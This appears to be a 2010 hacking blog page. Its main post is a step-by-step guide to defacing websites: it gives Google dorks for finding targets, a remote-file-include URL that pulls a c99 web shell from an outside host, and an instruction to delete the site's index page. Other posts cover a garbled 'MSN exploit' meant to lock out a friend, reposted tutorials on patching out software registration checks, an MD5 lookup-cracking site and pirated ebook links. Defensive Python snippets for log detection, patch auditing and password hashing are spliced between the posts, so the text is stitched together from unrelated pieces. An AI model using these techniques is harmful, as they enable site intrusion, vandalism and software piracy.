Monday, March 15, 2010

Defacing a Site using a c99 Shell

Okay, hey guys, today I will show you how to deface a site using a c99 shell.
Okay, first, what is defacing? Well, defacing is when you remove some contents of the site and show that it has been hacked by you. Defacing is a very good way of proving you're a good hacker. Okay, so let's get started.
First you need a c99 shell, which can be easily found on Google.
Your antivirus might think it's a virus but it isn't! Okay, now you will need to find exploitable sites. Here are some ways to find them:
Google Dork:
Code:
inurl:"upload.php"
Code:
inurl:"page=home.html"
Code:
inurl:"news/id="
That is one way of finding a c99 shell. Always upload a c99 shell with a .TXT or .JPG extension. You can change the extension but it won't change anything in the shell. I just leave mine as c99.txt.
Another way of finding vulnerable sites is finding a random website that shows
[CODE]http://site.com/page=
[/CODE]
On that page= you can put your shell so it would look like
[CODE]http://site.com/page=http://geocities.com/noimus13/c99.txt[/CODE]
If it's vulnerable it would look like this
See this..
It means it's vulnerable. Now let's add some cool stuff on it to show it's defaced!
First you gotta go to the Home Directory. Which is..
Code:
public_html
OR
Code:
httpd.www
But public_html is more used
Now let's navigate to that directory.
Okay, now once we are there you might see index.html.
Delete that. If you have your own index.html then this is what you would do
Now once you have uploaded it, go back to the site. It will be defaced, showing your name and whatever the hell you put in there.
Thanks for reading this tut!
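
Seen from the server side, the `page=` requests described in this post leave a clear trace in the web access log: an include-style parameter whose value is a full remote URL. The following is an added example, not part of the original post, that scans Apache combined-format log lines for that pattern; the log lines are constructed, and the parameter name `page` and the function names are assumptions for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined log format (not from a real server).
SAMPLE_LOG = """\
203.0.113.7 - - [15/Mar/2010:10:01:02 +0000] "GET /index.php?page=home.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [15/Mar/2010:10:03:44 +0000] "GET /index.php?page=http://files.example.net/c99.txt HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
203.0.113.9 - - [15/Mar/2010:10:04:10 +0000] "GET /index.php?page=http%3A%2F%2Ffiles.example.net%2Fc99.txt HTTP/1.1" 200 48230 "-" "Mozilla/5.0"
198.51.100.4 - - [15/Mar/2010:10:05:00 +0000] "GET /news.php?id=12&ref=http://partner.example.org/ HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.9 - - [15/Mar/2010:10:06:31 +0000] "GET /page=hTTp://files.example.net/c99.txt HTTP/1.1" 404 310 "-" "Mozilla/5.0"
"""

# client IP, timestamp, request target, status code
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" (\d{3}) \S+')
# name=value pairs after ?, &, ; or / (the post shows "page=" directly in the path)
PARAM_RE = re.compile(r'(?:^|[?&/;])([A-Za-z0-9_]+)=([^&\s]*)')
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)


def fully_decode(value, max_rounds=3):
    """Undo percent-encoding, including double encoding, up to max_rounds."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_rfi_attempts(log_text, include_params=("page",)):
    """Return one finding per request whose include parameter holds a remote URL.

    include_params is the set of parameters the application passes to its
    include logic (an assumption; adjust it per application).
    """
    wanted = {p.lower() for p in include_params}
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, when, target, status = m.groups()
        for name, raw in PARAM_RE.findall(target):
            value = fully_decode(raw)
            if name.lower() in wanted and REMOTE_RE.match(value):
                findings.append({"ip": ip, "time": when, "param": name,
                                 "value": value, "status": int(status)})
    return findings


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["status"], hit["param"], "=", hit["value"])
```

A 200 response with an unusual body size on a flagged request is the one to triage first. The durable fix is on the application side: map the parameter to an allow-list of local files and keep PHP's `allow_url_include` disabled.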

Exploit-Me

Exploit-Me is a Firefox plugin developed to ease penetration testing via the web browser. Exploit-Me is currently developed to exploit 2 types of web application vulnerabilities, which are SQL injection and XSS.
Download:
http://www.securitycompass.com/exploitme.shtml
Enjoy!

Hackers Highschool

The Hacker Highschool project is the development of license-free, security and privacy awareness teaching materials and back-end support for teachers of elementary, junior high, and high school students.
Today's kids and teens are in a world with major communication and productivity channels open to them and they don't have the knowledge to defend themselves against the fraud, identity theft, privacy leaks and other attacks made against them just for using the Internet. This is the reason for Hacker Highschool.
Download:
http://hotfile.com/dl/29938229/84f51c2/hacker_highschool.rar.html

MSN Exploit

If someone puts this code in his Personal Message, he'll never be able to log in again. Send it to a wannabe friend and say his name will be lit up or anything else. You'll see he'll log off, and when he wants to log on an error message comes up.
[CODE] n?a_??ay?m?a????????????a???O??????r??? ?+N? ?L??? [/code]

Google Apps Hacks

Can Google applications really become an alternative to the venerable
Microsoft Office suite? Conventional wisdom may say no, but practical
wisdom says otherwise. Right now, 100,000 small businesses are currently
running trials of Google office applications. So are large corporations
such as General Electric and Procter & Gamble. Google Apps Hacks gets
you in on the action with several ingenious ways to push Google's web,
mobile, and desktop apps to the limit. The scores of clever hacks and
workarounds in this book help you get more than the obvious out of a
whole host of Google's web-based applications for word processing,
spreadsheets, PowerPoint-style presentations, email, calendar, and more
by giving you ways to exploit the suite's unique network functionality.
You get plenty of ways to tinker with:
- Google Documents -- Share and edit documents with others in real
time, view them on the run with Google Docs mobile service, and use
Google Notebook for web research
- Google Spreadsheets -- Add real-time data to spreadsheets, and
generate charts and tables you can embed in web pages
- Google Presentations -- View them on a mobile phone and save them as
video
- Gmail -- Send email to and from a mobile phone, adjust Gmail's
layout with a style sheet, and a lot more
- iGoogle -- Create your own gadgets, program a screenscraper, add
Flash games, and more
- Google Calendar -- Add web content events, public calendars, and
your Outlook Calendar to this application
- Google Reader, Google Maps, Google Earth, and Google SketchUp: the
new 3D modeling software tool
- Picasa, YouTube, and Google Video -- discover new ways to customize
and use these media management apps
In addition, Google Apps Hacks outlines ways you can create a simple
web site with nothing but Google tools, including Page Creator, Blogger,
Google Analytics, and content from other Google apps. This amazing
collection just might convince you that Microsoft Office is not the last
word in business applications. The price is certainly right.
Download:
http://hotfile.com/dl/29935830/8c5c67b/Google.Apps.Hacks.Apr.2008.eBook_1_hackerz5.rar.html
http://hotfile.com/dl/29935846/9aea8dc/Google.Apps.Hacks.Apr.2008.eBook_2_hackerz5.rar.html

Cracking Tutorial Pt. 2

Cracking Tutorial - Part 2

Copyrights Reserved to the 1999 from Black Sun Research Facility (http://blacksun.box.sk).

Index:

0. Introduction.
1. Disclaimer.
2. The main steps of cracking.
3. Additional programs you need to have for this part of the tutorial.
4. Cracking the first program (sweet little piano).
5. Conclusion
========================================================================================

0. Introduction:

In this part, the second part of the cracking tutorial, you will learn to use the most
important tools of the common cracker: W32Dasm and HIEW.
You will also learn to crack some simple programs.
The tutorials are divided into 3 parts:
Part 1: Introduction, tools and the basics of cracking.
Part 2: Practical training, using W32Dasm, and HIEW.
Part 3: key-generators.
Welcome to the second part. :-)

1. Disclaimer:

I created this tutorial for informational purposes only!
Much of the information in this document can be used to perform illegal activities!
Don't attempt to do anything stated in this document!
If you do attempt to do anything, you are solely and fully responsible for what you do!
If you get caught and get in any kind of trouble, it's your own fault!
If you intend to use this information to impress your friends, leave it and grow up!
If you don't agree to this, do not read any more!
If you crack a program, and either sell the crack or offer it for free, it is a crime!

2. The main steps of cracking

You have already seen these steps in the previous part of the tutorial,
but it's very important to know them. Remembering these steps and following them is 40%
of the way towards success in cracking the program!!!
There are 7 steps in the cracking process:
1. Run the program you want to crack and study its behavior.
Try to locate strings and keywords, try to enter the password and see how the program responds.
2. Open the program with W32Dasm and disassemble it.
3. Find typical and common strings in the disassembly that appeared within the program.
In most cases, you have to look for keywords such as: password, name, date, expired,
time limit, wrong, entered and so on.
4. Find and observe the password generator, find and learn the protection routine and the API calls.
5. Try to understand the jumping mechanism of the protection.
6. Open the program in Hiew.
Change the jump of the flow control to its opposite jump command, or NOP it out.
7. Run and check how the change you have made in the original program affected it.
Feel the power you have, the power of cracking, making programs behave the way you want them to.
Learn those steps very well, until u dream of them, u will use them in every program you crack.

3. Additional programs you need to have for this part of the tutorial

By now, in this part of the tutorial, you have learnt the main steps of cracking.
Now, you are going to crack your first program.
But before that, you need to get a little program called: "Sweet Little Piano"
You can download it from:
-----------------
www.ronimusic.com
-----------------
Now, when you have the program, let's start!

4. Cracking the first program (Sweet little Piano)

Now we will follow each step and crack the program:
____________________________
Step 1: Running the program:
____________________________
Well, Run it! Duh... :-)
Well, what do we see here.....
The program opens two text files.
Also we see "Unregistered Shareware" on the caption bar...
Now let's open the Help menu for any registration options...
Humm, what do we see here now...
oh, it's a password option...
Well, select it and enter something (don't hope it will be right :-)).
To see what happens... Click OK..
Hmm, nothing happens....
Maybe it accepted it? Hmm.. no way... the caption bar still says Unregistered...
Ok close it... bah ... more text files ... and a notification that the settings are not
saved in the unregistered version ... well ... kind of irritating those text files!
Let's fix it :-)
________________________________
Step 2: Disassemble the program:
________________________________
Disassemble the program. Good, small is fast :-) Always....
Now, we don't have any strings that pop up when we want to register something...
Let's browse for strings like registered, unregistered, the string about the unsaved settings.
Hmm... evaluation time left ... password.txt.... passworddialog....
sweet little piano - Unregistered <<-- looks like our caption bar ;-) go on...
Thanks for registering ... cool! So it thanks you anyway :-)
Let's jump to that place ... Double click on it and we will pop right on top of the registration routine...
_____________________________________________________________________________________
Step 3: Analyzing the protection routine.... / Understanding the jumping Mechanism...
_____________________________________________________________________________________
Let's analyze the protection routine.
////////////////////// Code snip ///////////////////////////
ADDRESS MACHINE CODE ASSEMBLER INSTRUCTIONS
* Possible Reference to Dialog: PASSWORDDIALOG, CONTROL_ID:0064, ""
|
:00401715 6A64 push 00000064
:00401717 53 push ebx
* Reference To: USER32.GetDlgItemTextA, Ord:0000h
|
:00401718 E8A5B50000 Call 0040CCC2
:0040171D E822FFFFFF call 00401644
:00401722 85C0 test eax, eax
:00401724 741E je 00401744
:00401726 6A30 push 00000030
* Possible StringData Ref from Data Obj ->"SweetPiano"
|
:00401728 6866D24000 push 0040D266
* Possible StringData Ref from Data Obj ->"Thanks for registering!"
|
:0040172D 68FED14000 push 0040D1FE
:00401732 53 push ebx
////////////////////// Code snip ///////////////////////////
PasswordDialog ... a call to GetDlgItemTextA ... another call.... a test...
and depending on the test a je.... The je jumps over the thank you ...
And just ends the dialog box ... without telling you that you entered something wrong...
So this is right ... we did indeed not see that we typed something wrong ... but apparently we are supposed to see
if we type something right :-)
Again execute the je jump, and look where it goes to ... return from the jump....
Now lets try to rewrite what goes on here...
___________________________________________________________________________
call ShowPasswordDialog
call GetEnteredText
call IsEnteredTextGood
test value in eax
je QuietExit
ShowThanksForRegistering
QuietExit:
___________________________________________________________________________
the source code must have looked like this :
___________________________________________________________________________
GetDlgItemText(_ID_Serial);
if (EnteredTextGood) ShowThanksForRegistering
// else nothing....
___________________________________________________________________________
This is another interesting piece of code.... test eax, eax ... this assembler instruction tests if the value of eax is equal to itself ... if it is it is equal ... so a je instruction jumps ... if it is not equal, it does not jump....
To crack this program we can change the je instruction into two nop instructions... and we are done...
We have seen here, that the call has put a value in eax.... something which is not equal to zero or a zero... In our
previous example we saw that the called Is_Serial_Valid call set some value in memory ... Here we see that the called
Is_Serial_Valid call sets the eax register of our processor to some value....
Step 4: Changing the original program...
So modify it :-)
1. Open Hiew.
2. Open the file within Hiew.
3. Find the address of the line in W32Dasm (it's on the status bar beginning with '@').
4. Press F5 in Hiew.
5. Enter the address you have found in (4) and press ENTER.
6. Press F3 - for activating the write option.
7. Press F2 - to change the instruction.
8. Replace the command by 'NOP' (without quotes), which means NO OPERATION.
9. Now a new command appeared in the next line.
10. Replace it by NOP too.
11. If another new instruction hasn't appeared, Press F9 to update the file.
12. Press F10 to exit.
13. Run the program and see the result.
If you didn't succeed, have any questions or need any additional information,
E-Mail me at sagid@netvision.net.il and I will answer all of your questions.
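
For anyone who has to verify that a shipped binary is intact, the two edits this tutorial names (NOPing out the jump, or changing it to its opposite) show up as byte-level differences against a known-good copy. The following is an added example, not part of the original tutorial: it reuses the instruction bytes from the listing above, builds constructed modified copies, and reports which conditional jump changed; the function names are assumptions for illustration.

```python
import hashlib

BASE = 0x00401715  # virtual address of the first byte in the tutorial's listing

# Instruction bytes copied from the W32Dasm listing in the tutorial
# (00401715 through 00401732); the je 00401744 is the 74 1E at 00401724.
KNOWN_GOOD = bytes.fromhex(
    "6A64" "53" "E8A5B50000" "E822FFFFFF" "85C0" "741E"
    "6A30" "6866D24000" "68FED14000" "53"
)


def with_bytes_at(image, va, new_bytes, base=BASE):
    """Build a constructed test sample: image with new_bytes written at va."""
    off = va - base
    return image[:off] + new_bytes + image[off + len(new_bytes):]


def diff_runs(good, candidate):
    """Yield (offset, old, new) for every contiguous run of differing bytes."""
    if len(good) != len(candidate):
        raise ValueError("images differ in length; compare section by section")
    i = 0
    while i < len(good):
        if good[i] == candidate[i]:
            i += 1
            continue
        j = i
        while j < len(good) and good[j] != candidate[j]:
            j += 1
        yield i, good[i:j], candidate[i:j]
        i = j


def classify(old, new):
    """Heuristic label; a disassembler is needed to confirm instruction bounds."""
    is_short_jcc = 0x70 <= old[0] <= 0x7F  # short conditional jumps (rel8)
    if is_short_jcc and len(old) == 2 and new == b"\x90\x90":
        return "conditional jump replaced by NOPs"
    if is_short_jcc and len(old) == 1 and new[0] == old[0] ^ 1:
        return "conditional jump inverted"
    return "unclassified change"


def audit(good, candidate, base=BASE):
    """Compare a candidate image with the known-good one and explain the diffs."""
    findings = [
        (base + off, old.hex(), new.hex(), classify(old, new))
        for off, old, new in diff_runs(good, candidate)
    ]
    same = hashlib.sha256(good).digest() == hashlib.sha256(candidate).digest()
    return {"sha256_match": same, "findings": findings}


if __name__ == "__main__":
    for sample in (with_bytes_at(KNOWN_GOOD, 0x00401724, b"\x90\x90"),
                   with_bytes_at(KNOWN_GOOD, 0x00401724, b"\x75")):
        for va, old, new, label in audit(KNOWN_GOOD, sample)["findings"]:
            print(f"{va:08X}: {old} -> {new}  {label}")
```

The hash comparison alone answers "was it modified"; the run classification tells the analyst where to look, which matters when a protection rests on a single branch as it does here.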
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5. Conclusion

I gave this quite 'hard' cracking example so that u know that if you crack this program,
you can crack almost every program, and most of them are much simpler to crack.
In the next part you will learn to detect key generators and crack them.
Before you go to the next chapter, go over the steps again, and also go over the protection
mechanism detection and modification.
C ya then.
------------------------------------

Cracking Tutorial - Part 1

 version 1.0
Copyrights reserved to the (sagid@netvision.net.il) of Black Sun Research Facility (blacksun.box.sk)

index:

0. Introduction.
1. Disclaimer.
2. What is cracking?
3. Tools.
4. The main steps of cracking.
5. Basic terms in assembly.
6. Final conclusion.
========================================================================================

0. Introduction:

I have read many cracking tutorials lately.
Frankly speaking, I myself learned cracking from tutorials (and some book, but this doesn't really matter).
The majority of the cracking tutorials out there have a few disadvantages: either they are too long and contain a
lot of garbage, or they are too short, and don't contain the basics.
I decided to write a tutorial which will not have those two disadvantages.
Anyway, I divided the tutorial into 3 parts:
Part 1: Introduction, tools and The basics of cracking.
Part 2: Practical training, using W32Dasm, and HIEW
Part 3: Key-generators.
Welcome to the first part. ;-)

1. Disclaimer:

I created this tutorial for informational purposes only!
Much of the information in this document can be used to perform illegal activities!
Don't attempt to do anything stated in this document!
If you do attempt to do anything, you are solely and fully responsible for what you do!
If you get caught and get in any kind of trouble, it's your own fault!
If you intend to use this information to impress your friends, leave it and grow up!
If you don't agree to this, do not read any more!
If you crack a program, and either sell the crack or offer it for free, it is a crime!

2. What is Cracking?

For me, cracking is:
"Letting a program, which is on your computer behave as you want it
to behave and not behave as someone else (the programmer) wants"
As INTERN said:
"Hey, it is your stuff right? your numbers, your bits,
you should be able to do anything you wish to do with it "
Actually, I agree to this.
So cracking is modifying your programs, and making them work the way you want them to.
U can get a free demo program, crack it, and use it.
BUT!!!!
I repeat, if you crack a program, and start selling the cracked version or even offering it for free, it is a crime!
_____________________________________________________________________________
After reading those three tutorials (this is the first one in this series),
you will feel the power you have in your hands (I mean, in your head).
well, let's get started?

3. Tools

There are very few tools you need by now...
It is very easy to find them over the web, cause they are quite popular:
The first one is "Win32 Disassembler", which is also known as W32Dasm.
The Win32 Disassembler allows you to:
1. Disassemble files - translate the program to its assembly origin, or machine code.
The file types which can be disassembled in Win32 Disassembler:
exe, 386, com, cpl, drv, dll, fon, mpd, ocx, vbx, vbx and sys.
2. Load the program process and trace the program.
3. Browse the disassembled file and go to any code location that you want.
4. Find text.
5. Execute, insert or remove jumps and calls.
6. Import and export functions.
7. Show a HEX display of a code area.
8. Show the list of the STRINGS, DIALOGS and REFERENCES.
9. Save the Disassembly source in text format.
Well, u can get it in almost any cracking site, but I'll give you some URLs:
1. http://www.wco.com/~micuan/Zips/wdasm893.zip
--------------------------------------------
2. HTTP://CRACKING.HOME.ML.ORG/
----------------------------
3. http://www.fortunecity.com/bally/waterford/18/w32dsm89.zip
----------------------------------------------------------
4. http://wowsites.com/meiner/w32dsm89.zip
---------------------------------------
I think that's about enough.
If any of these links goes down, please alert me (my Email address is sagid@netvision.net.il).
The second tool you need is Hiew, which is also known as Hacker's View.
The Hacker's View Tool allows you to:
1. Disassemble files.
2. Make changes in the disassembled file, such as:
write commands, modify commands and reassemble the file.
3. View the file in ASCII, Hex or assembly mode.
Here are some URLs as well:
1. ftp://ftp.cs.tu-berlin.de/pub/msdos/mirro...rog/hiew584.zip
------------------------------------------------------------------------------------
2. ftp://ftp.bke.hu/pub/mirrors/sac/utilprog/hiew584.zip
-----------------------------------------------------
3. ftp://ftp.uakom.sk/pub/mirrors/sac/utilprog/hiew584.zip
-------------------------------------------------------
You can also download an excellent program for cracking called SoftICE.
Anyway, we won't need it in this part of the tutorial.
Anyway, here are some URLs for SoftICE.
SoftICE for Windows95:
1. http://swlink.net/~lachcik/insaine/si95w320.zip
-----------------------------------------------
2. http://www.fortunecity.com/bally/waterford/18/siw95-32.zip
----------------------------------------------------------
3. http://www.pmk.ac.th/~arnontc/files/siw95-32.zip
------------------------------------------------
4. ftp://toolz.ucl.autograd.ru/Debugger/W95ICE32.ZIP
-------------------------------------------------
SoftICE for Windows NT:
1. http://www.pmk.ac.th/~arnontc/files/siwnt-32.zip
------------------------------------------------
2. ftp://ftp.sol.no/users/r/reopsahl/OrcPaks/orcpak9e.zip
------------------------------------------------------
3. http://www.fortunecity.com/bally/waterford/18/siwnt-32.zip
----------------------------------------------------------
4. ftp://toolz.ucl.autograd.ru/Debugger/WNTICE32.ZIP
-------------------------------------------------
There's also SoftICE for DOS, which I don't recommend.
1. http://www.pmk.ac.th/~arnontc/files/s-ice280.zip
------------------------------------------------
2. ftp://ftp.ula.ve/pub/msdos/cracking/s-ice280.zip
------------------------------------------------
3. http://202.102.15.149/~person/paulgao/cracks/SICE280.ZIP
--------------------------------------------------------
4. ftp://ftp.sonic.net/pub/users/fryman/tools/S-ice280.zip
-------------------------------------------------------
5. http://www.chibacity.com/chiba/files/unpro/prx-pcs3.zip
-------------------------------------------------------
You can also download the Win 3.1x versions at:
1. ftp://ftp.ula.ve/pub/msdos/cracking/m_wice13.zip
------------------------------------------------
2. http://fishheads.simplenet.com/BriansFiles/m_wice13.zip
-------------------------------------------------------
3. http://www.magiccarpet.com/~odin/files/other/m_wice13.zip
---------------------------------------------------------

4. The Main steps of cracking

There are 7 steps in the process of cracking:
1. Run the program you want to crack and learn its standard behavior.
Try to locate strings and keywords, try to enter the password and see how the program responds.
2. Open up the program with W32Dasm and disassemble it.
3. Find typical and common strings in the disassembly that appeared in the program.
In most cases, you have to look for keywords such as: password, name, date, expired,
time limit, wrong, entered and so on.
4. Find and observe the password generator, find and learn the protection routine and the API calls.
5. Try to understand the jumping mechanism of the protection.
6. Open up the program in HIEW.
Change the jump of the flow control to its opposite jump command, or nop it out.
7. Run and see how the change you have made in the original program affected it.
Feel the power you have, the power of cracking, letting programs behave as you want them to.
Learn those steps very well, until u dream of them, u will use them in every program you crack.

5. Basic terms in Assembly

-------------
A. Registers:
-------------
Registers are variables which are stored in your processor.
The processor uses these variables for basic mathematical and logical operations.
The most used registers are: eax, ebx, ecx and edx.
Sometimes you will see edi, esi, esp, ebp.
There are three types of registers: 32-bit registers, 16-bit registers and 8-bit registers.
The 32-bit registers start with e, such as eax.
There are 16-bit equivalents of these registers.
The only difference between the two types is the variable size.
These registers are: ax, bx, cx, dx, di, si, sp, bp.
There are also 8-bit registers.
The 8-bit registers are: al, ah, bl, bh, cl, ch, dl, dh.
l - means the lower 8 bits of the 16-bit register.
h - means the higher 8 bits of the 16-bit register.
--------
B. Flags
--------
Flags are Boolean variables (get 0 or 1 values).
Flags are used by the processor for internal logical and mathematical operations,
in order to get the result of the operation.
The most important flag is the Zero Flag, which can get zero or non-zero (1) values.
------------
C. Code Flow
------------
When you are analyzing a piece of code, you must understand that the processor
is actually quite stupid, and all it does is to simply follow the basic instructions,
line by line.
It does anything the code tells it to do, and cannot do anything that is not written
in the code (unless it has been run over by a herd of cows and abducted by aliens).
This is why you have to think like the processor when you're analyzing a piece of code,
and to act like it (just don't get used to it! Inhale, exhale, inhale, exhale... nevermind, stupid joke)
You have to do everything the processor does, you have to compare registers and variables, execute jumps and calls,
calculate basic mathematical operations, store and load register values and addresses, and so on...
The processor has an instruction pointer especially for this, which is also called IP
(it has nothing to do with IP addresses in the Internet Protocol, trust me).
Using the instruction pointer, the processor points to the instruction that is about to be executed.
The processor also has and executes instructions which change the code flow.
These instructions can be function calls, any other routine calls, jumps, conditional jumps, which depend
on the zero flag, negative conditional jumps...

6. Conclusion

In this part of the tutorial we have learnt the meaning of the word cracking.
Making programs behave as you want them to, and not the way the programmer wants them to.
We have also learnt about the basic and the popular tools of cracking: W32Dasm, Hiew and SoftICE.
And finally we have learnt the 7 main steps of cracking.
Now, Before you go to the next chapter, you have to learn these 7 steps and download the tools
mentioned above, because we can't go on to the next chapter unless you have those tools and know the steps.
Cya in the next chapter.

Crack MD5 Hashes Online

[CODE]www.NetMD5Crack.com[/CODE]
Info:
Message Digest Algorithm 5, commonly referred to as MD5, is the internet standard in security applications. The algorithm yields a hash consisting of a 32 digit hexadecimal number, allowing for 2^128 unique outputs. There is no way to decrypt an MD5 hash. While there is no way to decrypt an MD5 hash, they can be cracked. An attacker may use a brute force method in an attempt to crack a hash. Brute forcing is when the attacker puts all imaginable combinations of characters through the algorithm and checks the outputs. When an output is generated with the same hash as the original, the attack is finished and the attacker has cracked the hash. NetMD5Crack offers another way for security analyzers to decrypt hashes. We have compiled a database of over 7,000,000 hashes and their plain text. To use our service simply enter a hash into the cracker. Our database will be searched thereafter. If we already have the hash then the plain text will be returned, saving you hours of time executing brute force attacks.
I tried it out and it works for me.
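
A precomputed database like the one described above only works because unsalted MD5 gives every user with the same password the same stored value. The following is an added example, not part of the original post, that puts the weak storage scheme beside a salted, iterated one (PBKDF2-HMAC-SHA256 from Python's standard library) and shows that only the first is answered by a lookup table; the word list is constructed and the function names and record format are assumptions for illustration.

```python
import hashlib
import hmac
import os

# Constructed stand-in for a precomputed hash database.
WORDLIST = ["letmein", "password", "qwerty", "dragon"]


def build_lookup(words):
    """Map unsalted MD5 hex digests back to their plain text."""
    return {hashlib.md5(w.encode()).hexdigest(): w for w in words}


def store_md5(password):
    """Weak storage: unsalted MD5, identical for every user with this password."""
    return hashlib.md5(password.encode()).hexdigest()


def store_pbkdf2(password, iterations=600_000):
    """Hardened storage: random per-record salt plus an iterated KDF."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_pbkdf2(password, record):
    """Recompute the KDF with the stored salt and compare in constant time."""
    _, iterations, salt_hex, dk_hex = record.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def lookup_exposure(password, table):
    """Store the same password twice under each scheme and query the table."""
    md5_a, md5_b = store_md5(password), store_md5(password)
    kdf_a, kdf_b = store_pbkdf2(password), store_pbkdf2(password)
    return {
        "md5_records_identical": md5_a == md5_b,
        "md5_recovered": table.get(md5_a),
        "kdf_records_identical": kdf_a == kdf_b,
        # Only the derived-key field could ever be looked up; the salt makes
        # it unique per record, so a shared table has nothing to match.
        "kdf_recovered": table.get(kdf_a.rsplit("$", 1)[1]),
    }


if __name__ == "__main__":
    for key, value in lookup_exposure("qwerty", build_lookup(WORDLIST)).items():
        print(f"{key}: {value}")
```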

Download IPL Anthems of all the teams


Theme Song of the DLF IPL

Click here to download DLF IPL theme song

Theme Song of Set Max T20 Extra Innings

Click here to download DLF IPL Extra Innings theme song

Chennai Super Kings IPL Team Anthem..

Click here to download DLF IPL Deccan Chargers anthem

Rajasthan Royals IPL Team Anthem..

a)2008 Version..

b)2009 Version..

Kolkata Knight Riders IPL Team Anthem..

a)2008 Version..

Click here to download DLF IPL Kolkata Knight Riders anthem (2008 Version)

b)2009 Version(Slow)..

c)2009 Version(Fast)

Mumbai Indians IPL Team Anthem..

a)Anthem 1

b)Anthem 2

Punjab Kings Eleven IPL Team Anthem..

Click here to download DLF IPL Punjab Kings anthem

Delhi Daredevils IPL Team Anthem